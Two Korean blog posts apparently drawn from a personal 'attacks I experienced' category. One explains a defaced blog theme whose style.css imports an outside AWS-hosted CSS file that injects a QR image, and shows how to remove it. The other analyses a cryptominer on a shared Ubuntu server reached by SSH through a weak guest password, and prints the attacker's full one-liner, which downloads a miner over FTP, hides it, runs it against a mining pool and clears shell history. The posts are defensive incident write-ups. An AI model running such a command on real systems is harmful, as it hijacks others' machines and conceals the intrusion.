일단 변조 당한 사이트의 모습이다.


왼측 상단에 선물이라는 글씨와 qr코드가 있다.

이는 원래 존재하지 않았던 사진 파일이며 이를 어디서 불러오는가에 대하여 알아야한다.

 

이 파일의 referer는 aws의 어느 css파일로서 이 css파일이 문제의 qr.png파일을 불러옴을 알 수 있다.

따라서 이 파일을 어디에서 불러오는 가를 봐야한다.

이 파일을 불러오는 것은 블로그 테마파일의 style.css파일로 본 블로그 기준 https://tistory3.daumcdn.net/tistory/2662024/skin/style.css 이며 개인이 수정이 가능하다.

 

수정을 해야하는 것은 파일의 4번째 라인의 파일로 

@import url(http://*************************.amazonaws.com/stylesheets/NotoSansKR-Hestia.css);

해당 라인을 제거 하면 된다.

 

qr.png파일을 불러온 순서는 다음과 같다.

style.css ==> NotoSansKR-Hestia.css(은닉을 위한 파일, 내용은 아래와 같다.) ==> qr.png

 

은닉을 위한 NotoSansKR-Hestia.css파일의 전체 내용

div#sidebar:before {
	content: url(http://*************.s3-website-ap-northeast-1.amazonaws.com/qr.png);
}

 

해결법 : style.css의 4번째 라인 제거

관리 페이지 => 스킨 편집 => 우측 상단 사진 아래 html편집 => css(이게 style.css) => 4번째 라인 제거

저작자표시 비영리 변경금지

'ETC > 공격당해본일' 카테고리의 다른 글

서버 마이닝 악성 행위  (0) 2017.09.13

여러명에서 사용하는 공동적인 우분투 서버(Ubuntu 16.04)가 있다.


이 서버에 오늘 새로운 사용자를 추가하고 접속하는 기록을 보기 위해 w(현재 접속자를 보기 위한 명령어)를 사용했다.




guest라는 계정은 임시 계정으로서 비밀번호가 취약하게 설정되어 있다고 판단되었다. 단순히 간단하게 설정된 패스워드와 잘 알려진 계정명을 통해 SSH로그인을 성공한 것으로 보인다.


이 글을 쓰고 있을 당시에는 guest의 패스워드를 바꾼 후이다.


현재 하고 있는 일은 miner를 동작하는 것으로 보인다. 명령어의 전부를 보기 위해 ps -aux | grep guest 명령어를 이용하여 해당 guest계정의 프로세스 리스트를 출력 하였다.




SSH에 연결되었다는 것을 나타내는 것과 miner를 돌리고 있는 명령어를 볼 수 있다.

miner를 돌리는 명령어를 정리하면 다음과 같다.


1. bash -c pkill minerd; pkill nohup; cd /tmp; wget ftp://[IP_B]/miner.tar; curl -O ftp://[IP_B]/miner.tar; tar -xvf miner.tar; rm -rf miner.tar; mv miner .miner; cd .miner; chmod 777 *; nohup ./minerd -a yescrypt -o stratum+tcp://stratum.eu.miners-pool.eu:8428 -u [Wallet_Address]; history -c

위 명령어는 ";"으로 여러 명령어를 한 라인으로 순차적 실행시키며 순서대로 다음과 같다. (추측성 해설)
1.1   bash -c pkill minerd; : bash로 minerd 프로세스를 kill한다.
1.2   pkill nohup; : nohup 프로세스를 kill한다.
1.3   cd /tmp; : tmp폴더로 이동한다.
1.4   wget ftp://[IP_B]/miner.tar; : ftp서버로 부터 miner프로그램을 받아온다. (IP주소는 마스킹함.)
1.5   curl -O ftp://[IP_B]/miner.tar; : ftp서버로 부터 miner프로그램을 받아온다. ==> wget이 사용불가일때 대응? (IP주소는 마스킹함.)
1.6   tar -xvf miner.tar; : 받아온 파일을 압축해제한다.
1.7   rm -rf miner.tar; : 압축해제를 하였으니 받아온 압축 파일을 삭제한다.
1.8   mv miner .miner;  : miner폴더는 압축이 해제된 폴더이니 이것을 ls명령어를 통해 보이지 않기 위해 .miner로 변경한다.
1.9   cd .miner; chmod 777 *; : 폴더 권한을 777로 바꾼다.
1.10 nohup ./minerd -a yescrypt -o stratum+tcp://stratum.eu.miners-pool.eu:8428 -u [Wallet_Address_A]; : miner를 실행한다.
1.11 history -c : 명령어를 사용한 history를 삭제한다.

2. ./minerd -a yescrypt -o stratum+tcp://stratum.eu.miners-pool.eu:8428 -u [Wallet_Adderss_A]
해당 명령의 PPID가 1.인 것으로 보아 1.에서 실행된다는 것을 알 수 있다.

다행인 것은 "서버의 CPU 성능이 후져 마이닝이 1도 되지 않는다"

그 다음은 IP를 통해 누구인지 찾아보았다.
일단 FTP서버의 아이피 IP_B의 80번 포트를 보았다.

하얗다.

소스코드를 본다.
해당 페이지를 소스코드 보기를 통해 보면 주석처리된 php코드를 볼 수 있다. 주석처리된 php코드는 file_get_contents('[URL_A]')로 다른 페이지의 소스를 그대로 가져오는 소스코드이다.

다른 주석은
//Below is your backed up index
//Please donate some bitcoins for checking your site vulnerability
//I will be glad if you co-operate
//donation address: [Wallet_Address_B]
이며,

예상컨데 해당 서버도 탈취당한 서버이며 해당 서버에 ftp를 통해 악성행위를 하는 것같다.
위에 나온 URL_A 페이지에 접속해보면 다음과 같은 페이지(블러 처리 및 워터마크? 처리 함.)와 노래가 같이 나온다.


IP_A와 IP_B모두 국내가 아니였으며 Wallet의 거래 기록을 보면 소액 거래만 있었다는 점에서 더 알 수 있는점이 있을것 같다.

저작자표시 비영리 변경금지

'ETC > 공격당해본일' 카테고리의 다른 글

Square Theme QR코드  (0) 2018.04.14

+ Recent posts

티스토리툴바